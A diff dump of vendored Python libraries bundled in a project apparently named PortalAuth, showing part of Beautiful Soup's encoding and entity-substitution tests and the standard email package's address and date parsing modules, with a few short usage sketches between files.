            with warnings.catch_warnings(record=True) as w:
                soup = self.soup(filename)
            msg = str(w[0].message)
            self.assertTrue("looks like a filename" in msg)
        finally:
            filehandle.close()

        # The file no longer exists, so Beautiful Soup will no longer issue the warning.
        with warnings.catch_warnings(record=True) as w:
            soup = self.soup(filename)
        self.assertEqual(0, len(w))

    def test_url_warning(self):
        with warnings.catch_warnings(record=True) as w:
            soup = self.soup("http://www.crummy.com/")
        msg = str(w[0].message)
        self.assertTrue("looks like a URL" in msg)

        with warnings.catch_warnings(record=True) as w:
            soup = self.soup("http://www.crummy.com/ is great")
        self.assertEqual(0, len(w))

class TestSelectiveParsing(SoupTest):

    def test_parse_with_soupstrainer(self):
        markup = "No<b>Yes</b><a>No<b>Yes <c>Yes</c></b>"
        strainer = SoupStrainer("b")
        soup = self.soup(markup, parse_only=strainer)
        self.assertEqual(soup.encode(), b"<b>Yes</b><b>Yes <c>Yes</c></b>")


class TestEntitySubstitution(unittest.TestCase):
    """Standalone tests of the EntitySubstitution class."""
    def setUp(self):
        self.sub = EntitySubstitution

    def test_simple_html_substitution(self):
        # Unicode characters corresponding to named HTML entities
        # are substituted, and no others.
        s = u"foo\u2200\N{SNOWMAN}\u00f5bar"
        self.assertEqual(self.sub.substitute_html(s),
                         u"foo&forall;\N{SNOWMAN}&otilde;bar")

    def test_smart_quote_substitution(self):
        # MS smart quotes are a common source of frustration, so we
        # give them a special test.
        quotes = b"\x91\x92foo\x93\x94"
        dammit = UnicodeDammit(quotes)
        self.assertEqual(self.sub.substitute_html(dammit.markup),
                         "&lsquo;&rsquo;foo&ldquo;&rdquo;")

    def test_xml_conversion_includes_no_quotes_if_make_quoted_attribute_is_false(self):
        s = 'Welcome to "my bar"'
        self.assertEqual(self.sub.substitute_xml(s, False), s)

    def test_xml_attribute_quoting_normally_uses_double_quotes(self):
        self.assertEqual(self.sub.substitute_xml("Welcome", True),
                         '"Welcome"')
        self.assertEqual(self.sub.substitute_xml("Bob's Bar", True),
                         '"Bob\'s Bar"')

    def test_xml_attribute_quoting_uses_single_quotes_when_value_contains_double_quotes(self):
        s = 'Welcome to "my bar"'
        self.assertEqual(self.sub.substitute_xml(s, True),
                         "'Welcome to \"my bar\"'")

    def test_xml_attribute_quoting_escapes_single_quotes_when_value_contains_both_single_and_double_quotes(self):
        s = 'Welcome to "Bob\'s Bar"'
        self.assertEqual(
            self.sub.substitute_xml(s, True),
            '"Welcome to &quot;Bob\'s Bar&quot;"')

    def test_xml_quotes_arent_escaped_when_value_is_not_being_quoted(self):
        quoted = 'Welcome to "Bob\'s Bar"'
        self.assertEqual(self.sub.substitute_xml(quoted), quoted)

    def test_xml_quoting_handles_angle_brackets(self):
        self.assertEqual(
            self.sub.substitute_xml("foo<bar>"),
            "foo&lt;bar&gt;")

    def test_xml_quoting_handles_ampersands(self):
        self.assertEqual(self.sub.substitute_xml("AT&T"), "AT&amp;T")

    def test_xml_quoting_including_ampersands_when_they_are_part_of_an_entity(self):
        self.assertEqual(
            self.sub.substitute_xml("&Aacute;T&T"),
            "&amp;Aacute;T&amp;T")

    def test_xml_quoting_ignoring_ampersands_when_they_are_part_of_an_entity(self):
        self.assertEqual(
            self.sub.substitute_xml_containing_entities("&Aacute;T&T"),
            "&Aacute;T&amp;T")

    def test_quotes_not_html_substituted(self):
        """There's no need to do this except inside attribute values."""
        text = 'Bob\'s "bar"'
        self.assertEqual(self.sub.substitute_html(text), text)


class TestEncodingConversion(SoupTest):
    # Test Beautiful Soup's ability to decode and encode from various
    # encodings.

    def setUp(self):
        super(TestEncodingConversion, self).setUp()
        self.unicode_data = u'<html><head><meta charset="utf-8"/></head><body><foo>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</foo></body></html>'
        self.utf8_data = self.unicode_data.encode("utf-8")
        # Just so you know what it looks like.
        self.assertEqual(
            self.utf8_data,
            b'<html><head><meta charset="utf-8"/></head><body><foo>Sacr\xc3\xa9 bleu!</foo></body></html>')

    def test_ascii_in_unicode_out(self):
        # ASCII input is converted to Unicode. The original_encoding
        # attribute is set to 'utf-8', a superset of ASCII.
        chardet = bs4.dammit.chardet_dammit
        logging.disable(logging.WARNING)
        try:
            def noop(str):
                return None
            # Disable chardet, which will realize that the ASCII is ASCII.
            bs4.dammit.chardet_dammit = noop
            ascii = b"<foo>a</foo>"
            soup_from_ascii = self.soup(ascii)
            unicode_output = soup_from_ascii.decode()
            self.assertTrue(isinstance(unicode_output, unicode))
            self.assertEqual(unicode_output, self.document_for(ascii.decode()))
            self.assertEqual(soup_from_ascii.original_encoding.lower(), "utf-8")
        finally:
            logging.disable(logging.NOTSET)
            bs4.dammit.chardet_dammit = chardet

    def test_unicode_in_unicode_out(self):
        # Unicode input is left alone. The original_encoding attribute
        # is not set.
        soup_from_unicode = self.soup(self.unicode_data)
        self.assertEqual(soup_from_unicode.decode(), self.unicode_data)
        self.assertEqual(soup_from_unicode.foo.string, u'Sacr\xe9 bleu!')
        self.assertEqual(soup_from_unicode.original_encoding, None)

    def test_utf8_in_unicode_out(self):
        # UTF-8 input is converted to Unicode. The original_encoding
        # attribute is set.
        soup_from_utf8 = self.soup(self.utf8_data)
        self.assertEqual(soup_from_utf8.decode(), self.unicode_data)
        self.assertEqual(soup_from_utf8.foo.string, u'Sacr\xe9 bleu!')

    def test_utf8_out(self):
        # The internal data structures can be encoded as UTF-8.
        soup_from_unicode = self.soup(self.unicode_data)
        self.assertEqual(soup_from_unicode.encode('utf-8'), self.utf8_data)

    @skipIf(
        PYTHON_2_PRE_2_7 or PYTHON_3_PRE_3_2,
        "Bad HTMLParser detected; skipping test of non-ASCII characters in attribute name.")
    def test_attribute_name_containing_unicode_characters(self):
        markup = u'<div><a \N{SNOWMAN}="snowman"></a></div>'
        self.assertEqual(self.soup(markup).div.encode("utf8"), markup.encode("utf8"))

class TestUnicodeDammit(unittest.TestCase):
    """Standalone tests of UnicodeDammit."""

    def test_unicode_input(self):
        markup = u"I'm already Unicode! \N{SNOWMAN}"
        dammit = UnicodeDammit(markup)
        self.assertEqual(dammit.unicode_markup, markup)

    def test_smart_quotes_to_unicode(self):
        markup = b"<foo>\x91\x92\x93\x94</foo>"
        dammit = UnicodeDammit(markup)
        self.assertEqual(
            dammit.unicode_markup, u"<foo>\u2018\u2019\u201c\u201d</foo>")

    def test_smart_quotes_to_xml_entities(self):
        markup = b"<foo>\x91\x92\x93\x94</foo>"
        dammit = UnicodeDammit(markup, smart_quotes_to="xml")
        self.assertEqual(
            dammit.unicode_markup, "<foo>&#x2018;&#x2019;&#x201C;&#x201D;</foo>")

    def test_smart_quotes_to_html_entities(self):
        markup = b"<foo>\x91\x92\x93\x94</foo>"
        dammit = UnicodeDammit(markup, smart_quotes_to="html")
        self.assertEqual(
            dammit.unicode_markup, "<foo>&lsquo;&rsquo;&ldquo;&rdquo;</foo>")

    def test_smart_quotes_to_ascii(self):
        markup = b"<foo>\x91\x92\x93\x94</foo>"
        dammit = UnicodeDammit(markup, smart_quotes_to="ascii")
        self.assertEqual(
            dammit.unicode_markup, """<foo>''""</foo>""")

    def test_detect_utf8(self):
        utf8 = b"\xc3\xa9"
        dammit = UnicodeDammit(utf8)
        self.assertEqual(dammit.unicode_markup, u'\xe9')
        self.assertEqual(dammit.original_encoding.lower(), 'utf-8')

    def test_convert_hebrew(self):
        hebrew = b"\xed\xe5\xec\xf9"
        dammit = UnicodeDammit(hebrew, ["iso-8859-8"])
        self.assertEqual(dammit.original_encoding.lower(), 'iso-8859-8')
        self.assertEqual(dammit.unicode_markup, u'\u05dd\u05d5\u05dc\u05e9')

    def test_dont_see_smart_quotes_where_there_are_none(self):
        utf_8 = b"\343\202\261\343\203\274\343\202\277\343\202\244 Watch"
        dammit = UnicodeDammit(utf_8)
        self.assertEqual(dammit.original_encoding.lower(), 'utf-8')
        self.assertEqual(dammit.unicode_markup.encode("utf-8"), utf_8)

    def test_ignore_inappropriate_codecs(self):
        utf8_data = u"Räksmörgås".encode("utf-8")
        dammit = UnicodeDammit(utf8_data, ["iso-8859-8"])
        self.assertEqual(dammit.original_encoding.lower(), 'utf-8')

    def test_ignore_invalid_codecs(self):
        utf8_data = u"Räksmörgås".encode("utf-8")
        for bad_encoding in ['.utf8', '...', 'utF---16.!']:
            dammit = UnicodeDammit(utf8_data, [bad_encoding])
            self.assertEqual(dammit.original_encoding.lower(), 'utf-8')

    def test_exclude_encodings(self):
        # This is UTF-8.
        utf8_data = u"Räksmörgås".encode("utf-8")

        # But if we exclude UTF-8 from consideration, the guess is
        # Windows-1252.
        dammit = UnicodeDammit(utf8_data, exclude_encodings=["utf-8"])
        self.assertEqual(dammit.original_encoding.lower(), 'windows-1252')

        # And if we exclude that, there is no valid guess at all.
        dammit = UnicodeDammit(
            utf8_data, exclude_encodings=["utf-8", "windows-1252"])
        self.assertEqual(dammit.original_encoding, None)

    def test_encoding_detector_replaces_junk_in_encoding_name_with_replacement_character(self):
        detected = EncodingDetector(
            b'<?xml version="1.0" encoding="UTF-\xdb" ?>')
        encodings = list(detected.encodings)
        assert u'utf-\N{REPLACEMENT CHARACTER}' in encodings

    def test_detect_html5_style_meta_tag(self):

        for data in (
            b'<html><meta charset="euc-jp" /></html>',
            b"<html><meta charset='euc-jp' /></html>",
            b"<html><meta charset=euc-jp /></html>",
            b"<html><meta charset=euc-jp/></html>"):
            dammit = UnicodeDammit(data, is_html=True)
            self.assertEqual(
                "euc-jp", dammit.original_encoding)

    def test_last_ditch_entity_replacement(self):
        # This is a UTF-8 document that contains bytestrings
        # completely incompatible with UTF-8 (ie. encoded with some other
        # encoding).
        #
        # Since there is no consistent encoding for the document,
        # Unicode, Dammit will eventually encode the document as UTF-8
        # and encode the incompatible characters as REPLACEMENT
        # CHARACTER.
        #
        # If chardet is installed, it will detect that the document
        # can be converted into ISO-8859-1 without errors. This happens
        # to be the wrong encoding, but it is a consistent encoding, so the
        # code we're testing here won't run.
        #
        # So we temporarily disable chardet if it's present.
        doc = b"""\357\273\277<?xml version="1.0" encoding="UTF-8"?>
<html><b>\330\250\330\252\330\261</b>
<i>\310\322\321\220\312\321\355\344</i></html>"""
        chardet = bs4.dammit.chardet_dammit
        logging.disable(logging.WARNING)
        try:
            def noop(str):
                return None
            bs4.dammit.chardet_dammit = noop
            dammit = UnicodeDammit(doc)
            self.assertEqual(True, dammit.contains_replacement_characters)
            self.assertTrue(u"\ufffd" in dammit.unicode_markup)

            soup = BeautifulSoup(doc, "html.parser")
            self.assertTrue(soup.contains_replacement_characters)
        finally:
            logging.disable(logging.NOTSET)
            bs4.dammit.chardet_dammit = chardet

    def test_byte_order_mark_removed(self):
        # A document written in UTF-16LE will have its byte order marker stripped.
        data = b'\xff\xfe<\x00a\x00>\x00\xe1\x00\xe9\x00<\x00/\x00a\x00>\x00'
        dammit = UnicodeDammit(data)
        self.assertEqual(u"<a>áé</a>", dammit.unicode_markup)
        self.assertEqual("utf-16le", dammit.original_encoding)

    def test_detwingle(self):
        # Here's a UTF8 document.
        utf8 = (u"\N{SNOWMAN}" * 3).encode("utf8")

        # Here's a Windows-1252 document.
        windows_1252 = (
            u"\N{LEFT DOUBLE QUOTATION MARK}Hi, I like Windows!"
            u"\N{RIGHT DOUBLE QUOTATION MARK}").encode("windows_1252")

        # Through some unholy alchemy, they've been stuck together.
        doc = utf8 + windows_1252 + utf8

        # The document can't be turned into UTF-8:
        self.assertRaises(UnicodeDecodeError, doc.decode, "utf8")

        # Unicode, Dammit thinks the whole document is Windows-1252,
        # and decodes it into "☃☃☃“Hi, I like Windows!”☃☃☃"

        # But if we run it through fix_embedded_windows_1252, it's fixed:

        fixed = UnicodeDammit.detwingle(doc)
        self.assertEqual(
            u"☃☃☃“Hi, I like Windows!”☃☃☃", fixed.decode("utf8"))

    def test_detwingle_ignores_multibyte_characters(self):
        # Each of these characters has a UTF-8 representation ending
        # in \x93. \x93 is a smart quote if interpreted as
        # Windows-1252. But our code knows to skip over multibyte
        # UTF-8 characters, so they'll survive the process unscathed.
        for tricky_unicode_char in (
            u"\N{LATIN SMALL LIGATURE OE}", # 2-byte char '\xc5\x93'
            u"\N{LATIN SUBSCRIPT SMALL LETTER X}", # 3-byte char '\xe2\x82\x93'
            u"\xf0\x90\x90\x93", # This is a CJK character, not sure which one.
            ):
            input = tricky_unicode_char.encode("utf8")
            self.assertTrue(input.endswith(b'\x93'))
            output = UnicodeDammit.detwingle(input)
            self.assertEqual(output, input)

class TestNamedspacedAttribute(SoupTest):

    def test_name_may_be_none(self):
        a = NamespacedAttribute("xmlns", None)
        self.assertEqual(a, "xmlns")

    def test_attribute_is_equivalent_to_colon_separated_string(self):
        a = NamespacedAttribute("a", "b")
        self.assertEqual("a:b", a)

    def test_attributes_are_equivalent_if_prefix_and_name_identical(self):
        a = NamespacedAttribute("a", "b", "c")
        b = NamespacedAttribute("a", "b", "c")
        self.assertEqual(a, b)

        # The actual namespace is not considered.
        c = NamespacedAttribute("a", "b", None)
        self.assertEqual(a, c)

        # But name and prefix are important.
        d = NamespacedAttribute("a", "z", "c")
        self.assertNotEqual(a, d)

        e = NamespacedAttribute("z", "b", "c")
        self.assertNotEqual(a, e)


class TestAttributeValueWithCharsetSubstitution(unittest.TestCase):

def test_content_meta_attribute_value(self):
|
||||
value = CharsetMetaAttributeValue("euc-jp")
|
||||
self.assertEqual("euc-jp", value)
|
||||
self.assertEqual("euc-jp", value.original_value)
|
||||
self.assertEqual("utf8", value.encode("utf8"))
|
||||
|
||||
|
||||
def test_content_meta_attribute_value(self):
|
||||
value = ContentMetaAttributeValue("text/html; charset=euc-jp")
|
||||
self.assertEqual("text/html; charset=euc-jp", value)
|
||||
self.assertEqual("text/html; charset=euc-jp", value.original_value)
|
||||
self.assertEqual("text/html; charset=utf8", value.encode("utf8"))
|
||||
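A quick sketch of the behavior the detwingle tests above rely on: UnicodeDammit.detwingle() re-encodes Windows-1252 bytes embedded in otherwise-valid UTF-8 so the combined byte string decodes cleanly (editor's illustration, Python 2, assuming bs4 is importable as in these tests):

from bs4 import UnicodeDammit

utf8_part = u"\N{SNOWMAN}".encode("utf8")
cp1252_part = u"\N{LEFT DOUBLE QUOTATION MARK}Hi!".encode("windows-1252")
mixed = utf8_part + cp1252_part         # not decodable as UTF-8 as-is
fixed = UnicodeDammit.detwingle(mixed)  # the smart quote is re-encoded as UTF-8
assert fixed.decode("utf8") == u"\u2603\u201cHi!"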
1979
PortalAuth/includes/scripts/libs/bs4/tests/test_tree.py
Executable file
File diff suppressed because it is too large
123
PortalAuth/includes/scripts/libs/email/__init__.py
Executable file
@@ -0,0 +1,123 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""A package for parsing, handling, and generating email messages."""

__version__ = '4.0.3'

__all__ = [
    # Old names
    'base64MIME',
    'Charset',
    'Encoders',
    'Errors',
    'Generator',
    'Header',
    'Iterators',
    'Message',
    'MIMEAudio',
    'MIMEBase',
    'MIMEImage',
    'MIMEMessage',
    'MIMEMultipart',
    'MIMENonMultipart',
    'MIMEText',
    'Parser',
    'quopriMIME',
    'Utils',
    'message_from_string',
    'message_from_file',
    # new names
    'base64mime',
    'charset',
    'encoders',
    'errors',
    'generator',
    'header',
    'iterators',
    'message',
    'mime',
    'parser',
    'quoprimime',
    'utils',
    ]



# Some convenience routines.  Don't import Parser and Message as side-effects
# of importing email since those cascadingly import most of the rest of the
# email package.
def message_from_string(s, *args, **kws):
    """Parse a string into a Message object model.

    Optional _class and strict are passed to the Parser constructor.
    """
    from email.parser import Parser
    return Parser(*args, **kws).parsestr(s)


def message_from_file(fp, *args, **kws):
    """Read a file and parse its contents into a Message object model.

    Optional _class and strict are passed to the Parser constructor.
    """
    from email.parser import Parser
    return Parser(*args, **kws).parse(fp)



# Lazy loading to provide name mapping from new-style names (PEP 8 compatible
# email 4.0 module names), to old-style names (email 3.0 module names).
import sys

class LazyImporter(object):
    def __init__(self, module_name):
        self.__name__ = 'email.' + module_name

    def __getattr__(self, name):
        __import__(self.__name__)
        mod = sys.modules[self.__name__]
        self.__dict__.update(mod.__dict__)
        return getattr(mod, name)


_LOWERNAMES = [
    # email.<old name> -> email.<new name is lowercased old name>
    'Charset',
    'Encoders',
    'Errors',
    'FeedParser',
    'Generator',
    'Header',
    'Iterators',
    'Message',
    'Parser',
    'Utils',
    'base64MIME',
    'quopriMIME',
    ]

_MIMENAMES = [
    # email.MIME<old name> -> email.mime.<new name is lowercased old name>
    'Audio',
    'Base',
    'Image',
    'Message',
    'Multipart',
    'NonMultipart',
    'Text',
    ]

for _name in _LOWERNAMES:
    importer = LazyImporter(_name.lower())
    sys.modules['email.' + _name] = importer
    setattr(sys.modules['email'], _name, importer)


import email.mime
for _name in _MIMENAMES:
    importer = LazyImporter('mime.' + _name.lower())
    sys.modules['email.MIME' + _name] = importer
    setattr(sys.modules['email'], 'MIME' + _name, importer)
    setattr(sys.modules['email.mime'], _name, importer)
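The convenience parsers and the LazyImporter shim above mean the old (email 3.0) and new (email 4.0) names resolve to the same modules. A minimal usage sketch (editor's illustration, Python 2, assuming this vendored package shadows the stdlib email on sys.path):

import email

msg = email.message_from_string("Subject: hello\n\nbody text\n")
print msg['Subject']     # -> hello
print msg.get_payload()  # -> body text

from email import Utils  # materialized on demand by LazyImporter
print Utils.parseaddr('Portal Auth <pa@example.com>')  # -> ('Portal Auth', 'pa@example.com')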
BIN
PortalAuth/includes/scripts/libs/email/__init__.pyc
Executable file
Binary file not shown.
497
PortalAuth/includes/scripts/libs/email/_parseaddr.py
Executable file
@@ -0,0 +1,497 @@
# Copyright (C) 2002-2007 Python Software Foundation
# Contact: email-sig@python.org

"""Email address parsing code.

Lifted directly from rfc822.py.  This should eventually be rewritten.
"""

__all__ = [
    'mktime_tz',
    'parsedate',
    'parsedate_tz',
    'quote',
    ]

import time

SPACE = ' '
EMPTYSTRING = ''
COMMASPACE = ', '

# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
               'aug', 'sep', 'oct', 'nov', 'dec',
               'january', 'february', 'march', 'april', 'may', 'june', 'july',
               'august', 'september', 'october', 'november', 'december']

_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']

# The timezone table does not include the military time zones defined
# in RFC822, other than Z.  According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones.  RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.

_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
              'AST': -400, 'ADT': -300,  # Atlantic (used in Canada)
              'EST': -500, 'EDT': -400,  # Eastern
              'CST': -600, 'CDT': -500,  # Central
              'MST': -700, 'MDT': -600,  # Mountain
              'PST': -800, 'PDT': -700   # Pacific
              }


def parsedate_tz(data):
    """Convert a date string to a time tuple.

    Accounts for military timezones.
    """
    data = data.split()
    # The FWS after the comma after the day-of-week is optional, so search and
    # adjust for this.
    if data[0].endswith(',') or data[0].lower() in _daynames:
        # There's a dayname here. Skip it
        del data[0]
    else:
        i = data[0].rfind(',')
        if i >= 0:
            data[0] = data[0][i+1:]
    if len(data) == 3: # RFC 850 date, deprecated
        stuff = data[0].split('-')
        if len(stuff) == 3:
            data = stuff + data[1:]
    if len(data) == 4:
        s = data[3]
        i = s.find('+')
        if i > 0:
            data[3:] = [s[:i], s[i+1:]]
        else:
            data.append('') # Dummy tz
    if len(data) < 5:
        return None
    data = data[:5]
    [dd, mm, yy, tm, tz] = data
    mm = mm.lower()
    if mm not in _monthnames:
        dd, mm = mm, dd.lower()
        if mm not in _monthnames:
            return None
    mm = _monthnames.index(mm) + 1
    if mm > 12:
        mm -= 12
    if dd[-1] == ',':
        dd = dd[:-1]
    i = yy.find(':')
    if i > 0:
        yy, tm = tm, yy
    if yy[-1] == ',':
        yy = yy[:-1]
    if not yy[0].isdigit():
        yy, tz = tz, yy
    if tm[-1] == ',':
        tm = tm[:-1]
    tm = tm.split(':')
    if len(tm) == 2:
        [thh, tmm] = tm
        tss = '0'
    elif len(tm) == 3:
        [thh, tmm, tss] = tm
    else:
        return None
    try:
        yy = int(yy)
        dd = int(dd)
        thh = int(thh)
        tmm = int(tmm)
        tss = int(tss)
    except ValueError:
        return None
    # Check for a yy specified in two-digit format, then convert it to the
    # appropriate four-digit format, according to the POSIX standard. RFC 822
    # calls for a two-digit yy, but RFC 2822 (which obsoletes RFC 822)
    # mandates a 4-digit yy. For more information, see the documentation for
    # the time module.
    if yy < 100:
        # The year is between 1969 and 1999 (inclusive).
        if yy > 68:
            yy += 1900
        # The year is between 2000 and 2068 (inclusive).
        else:
            yy += 2000
    tzoffset = None
    tz = tz.upper()
    if tz in _timezones:
        tzoffset = _timezones[tz]
    else:
        try:
            tzoffset = int(tz)
        except ValueError:
            pass
    # Convert a timezone offset into seconds ; -0500 -> -18000
    if tzoffset:
        if tzoffset < 0:
            tzsign = -1
            tzoffset = -tzoffset
        else:
            tzsign = 1
        tzoffset = tzsign * ( (tzoffset//100)*3600 + (tzoffset % 100)*60)
    # Daylight Saving Time flag is set to -1, since DST is unknown.
    return yy, mm, dd, thh, tmm, tss, 0, 1, -1, tzoffset


def parsedate(data):
    """Convert a time string to a time tuple."""
    t = parsedate_tz(data)
    if isinstance(t, tuple):
        return t[:9]
    else:
        return t


def mktime_tz(data):
    """Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
    if data[9] is None:
        # No zone info, so localtime is better assumption than GMT
        return time.mktime(data[:8] + (-1,))
    else:
        t = time.mktime(data[:8] + (0,))
        return t - data[9] - time.timezone


def quote(str):
    """Prepare string to be used in a quoted string.

    Turns backslash and double quote characters into quoted pairs.  These
    are the only characters that need to be quoted inside a quoted string.
    Does not add the surrounding double quotes.
    """
    return str.replace('\\', '\\\\').replace('"', '\\"')


class AddrlistClass:
    """Address parser class by Ben Escoto.

    To understand what this class does, it helps to have a copy of RFC 2822 in
    front of you.

    Note: this class interface is deprecated and may be removed in the future.
    Use rfc822.AddressList instead.
    """

    def __init__(self, field):
        """Initialize a new instance.

        `field' is an unparsed address header field, containing
        one or more addresses.
        """
        self.specials = '()<>@,:;.\"[]'
        self.pos = 0
        self.LWS = ' \t'
        self.CR = '\r\n'
        self.FWS = self.LWS + self.CR
        self.atomends = self.specials + self.LWS + self.CR
        # Note that RFC 2822 now specifies `.' as obs-phrase, meaning that it
        # is obsolete syntax.  RFC 2822 requires that we recognize obsolete
        # syntax, so allow dots in phrases.
        self.phraseends = self.atomends.replace('.', '')
        self.field = field
        self.commentlist = []

    def gotonext(self):
        """Parse up to the start of the next address."""
        while self.pos < len(self.field):
            if self.field[self.pos] in self.LWS + '\n\r':
                self.pos += 1
            elif self.field[self.pos] == '(':
                self.commentlist.append(self.getcomment())
            else:
                break

    def getaddrlist(self):
        """Parse all addresses.

        Returns a list containing all of the addresses.
        """
        result = []
        while self.pos < len(self.field):
            ad = self.getaddress()
            if ad:
                result += ad
            else:
                result.append(('', ''))
        return result

    def getaddress(self):
        """Parse the next address."""
        self.commentlist = []
        self.gotonext()

        oldpos = self.pos
        oldcl = self.commentlist
        plist = self.getphraselist()

        self.gotonext()
        returnlist = []

        if self.pos >= len(self.field):
            # Bad email address technically, no domain.
            if plist:
                returnlist = [(SPACE.join(self.commentlist), plist[0])]

        elif self.field[self.pos] in '.@':
            # email address is just an addrspec
            # this isn't very efficient since we start over
            self.pos = oldpos
            self.commentlist = oldcl
            addrspec = self.getaddrspec()
            returnlist = [(SPACE.join(self.commentlist), addrspec)]

        elif self.field[self.pos] == ':':
            # address is a group
            returnlist = []

            fieldlen = len(self.field)
            self.pos += 1
            while self.pos < len(self.field):
                self.gotonext()
                if self.pos < fieldlen and self.field[self.pos] == ';':
                    self.pos += 1
                    break
                returnlist = returnlist + self.getaddress()

        elif self.field[self.pos] == '<':
            # Address is a phrase then a route addr
            routeaddr = self.getrouteaddr()

            if self.commentlist:
                returnlist = [(SPACE.join(plist) + ' (' +
                               ' '.join(self.commentlist) + ')', routeaddr)]
            else:
                returnlist = [(SPACE.join(plist), routeaddr)]

        else:
            if plist:
                returnlist = [(SPACE.join(self.commentlist), plist[0])]
            elif self.field[self.pos] in self.specials:
                self.pos += 1

        self.gotonext()
        if self.pos < len(self.field) and self.field[self.pos] == ',':
            self.pos += 1
        return returnlist

    def getrouteaddr(self):
        """Parse a route address (Return-path value).

        This method just skips all the route stuff and returns the addrspec.
        """
        if self.field[self.pos] != '<':
            return

        expectroute = False
        self.pos += 1
        self.gotonext()
        adlist = ''
        while self.pos < len(self.field):
            if expectroute:
                self.getdomain()
                expectroute = False
            elif self.field[self.pos] == '>':
                self.pos += 1
                break
            elif self.field[self.pos] == '@':
                self.pos += 1
                expectroute = True
            elif self.field[self.pos] == ':':
                self.pos += 1
            else:
                adlist = self.getaddrspec()
                self.pos += 1
                break
            self.gotonext()

        return adlist

    def getaddrspec(self):
        """Parse an RFC 2822 addr-spec."""
        aslist = []

        self.gotonext()
        while self.pos < len(self.field):
            if self.field[self.pos] == '.':
                aslist.append('.')
                self.pos += 1
            elif self.field[self.pos] == '"':
                aslist.append('"%s"' % quote(self.getquote()))
            elif self.field[self.pos] in self.atomends:
                break
            else:
                aslist.append(self.getatom())
            self.gotonext()

        if self.pos >= len(self.field) or self.field[self.pos] != '@':
            return EMPTYSTRING.join(aslist)

        aslist.append('@')
        self.pos += 1
        self.gotonext()
        return EMPTYSTRING.join(aslist) + self.getdomain()

    def getdomain(self):
        """Get the complete domain name from an address."""
        sdlist = []
        while self.pos < len(self.field):
            if self.field[self.pos] in self.LWS:
                self.pos += 1
            elif self.field[self.pos] == '(':
                self.commentlist.append(self.getcomment())
            elif self.field[self.pos] == '[':
                sdlist.append(self.getdomainliteral())
            elif self.field[self.pos] == '.':
                self.pos += 1
                sdlist.append('.')
            elif self.field[self.pos] in self.atomends:
                break
            else:
                sdlist.append(self.getatom())
        return EMPTYSTRING.join(sdlist)

    def getdelimited(self, beginchar, endchars, allowcomments=True):
        """Parse a header fragment delimited by special characters.

        `beginchar' is the start character for the fragment.
        If self is not looking at an instance of `beginchar' then
        getdelimited returns the empty string.

        `endchars' is a sequence of allowable end-delimiting characters.
        Parsing stops when one of these is encountered.

        If `allowcomments' is non-zero, embedded RFC 2822 comments are allowed
        within the parsed fragment.
        """
        if self.field[self.pos] != beginchar:
            return ''

        slist = ['']
        quote = False
        self.pos += 1
        while self.pos < len(self.field):
            if quote:
                slist.append(self.field[self.pos])
                quote = False
            elif self.field[self.pos] in endchars:
                self.pos += 1
                break
            elif allowcomments and self.field[self.pos] == '(':
                slist.append(self.getcomment())
                continue        # have already advanced pos from getcomment
            elif self.field[self.pos] == '\\':
                quote = True
            else:
                slist.append(self.field[self.pos])
            self.pos += 1

        return EMPTYSTRING.join(slist)

    def getquote(self):
        """Get a quote-delimited fragment from self's field."""
        return self.getdelimited('"', '"\r', False)

    def getcomment(self):
        """Get a parenthesis-delimited fragment from self's field."""
        return self.getdelimited('(', ')\r', True)

    def getdomainliteral(self):
        """Parse an RFC 2822 domain-literal."""
        return '[%s]' % self.getdelimited('[', ']\r', False)

    def getatom(self, atomends=None):
        """Parse an RFC 2822 atom.

        Optional atomends specifies a different set of end token delimiters
        (the default is to use self.atomends).  This is used e.g. in
        getphraselist() since phrase endings must not include the `.' (which
        is legal in phrases)."""
        atomlist = ['']
        if atomends is None:
            atomends = self.atomends

        while self.pos < len(self.field):
            if self.field[self.pos] in atomends:
                break
            else:
                atomlist.append(self.field[self.pos])
            self.pos += 1

        return EMPTYSTRING.join(atomlist)

    def getphraselist(self):
        """Parse a sequence of RFC 2822 phrases.

        A phrase is a sequence of words, which are in turn either RFC 2822
        atoms or quoted-strings.  Phrases are canonicalized by squeezing all
        runs of continuous whitespace into one space.
        """
        plist = []

        while self.pos < len(self.field):
            if self.field[self.pos] in self.FWS:
                self.pos += 1
            elif self.field[self.pos] == '"':
                plist.append(self.getquote())
            elif self.field[self.pos] == '(':
                self.commentlist.append(self.getcomment())
            elif self.field[self.pos] in self.phraseends:
                break
            else:
                plist.append(self.getatom(self.phraseends))

        return plist


class AddressList(AddrlistClass):
    """An AddressList encapsulates a list of parsed RFC 2822 addresses."""
    def __init__(self, field):
        AddrlistClass.__init__(self, field)
        if field:
            self.addresslist = self.getaddrlist()
        else:
            self.addresslist = []

    def __len__(self):
        return len(self.addresslist)

    def __add__(self, other):
        # Set union
        newaddr = AddressList(None)
        newaddr.addresslist = self.addresslist[:]
        for x in other.addresslist:
            if not x in self.addresslist:
                newaddr.addresslist.append(x)
        return newaddr

    def __iadd__(self, other):
        # Set union, in-place
        for x in other.addresslist:
            if not x in self.addresslist:
                self.addresslist.append(x)
        return self

    def __sub__(self, other):
        # Set difference
        newaddr = AddressList(None)
        for x in self.addresslist:
            if not x in other.addresslist:
                newaddr.addresslist.append(x)
        return newaddr

    def __isub__(self, other):
        # Set difference, in-place
        for x in other.addresslist:
            if x in self.addresslist:
                self.addresslist.remove(x)
        return self

    def __getitem__(self, index):
        # Make indexing, slices, and 'in' work
        return self.addresslist[index]
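parsedate_tz() returns a 10-tuple whose last element is the zone offset in seconds, which mktime_tz() folds back in to produce a UTC timestamp; AddressList supports set-style arithmetic on parsed addresses. A short sketch (editor's illustration, Python 2):

from email._parseaddr import AddressList, mktime_tz, parsedate_tz

t = parsedate_tz('Fri, 13 Feb 2009 18:31:30 -0500')
print t[:6], t[9]   # -> (2009, 2, 13, 18, 31, 30) -18000
print mktime_tz(t)  # -> 1234567890.0 (UTC timestamp)

a = AddressList('One <one@example.com>, Two <two@example.com>')
b = AddressList('Two <two@example.com>')
print (a - b).addresslist  # set difference -> [('One', 'one@example.com')]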
BIN
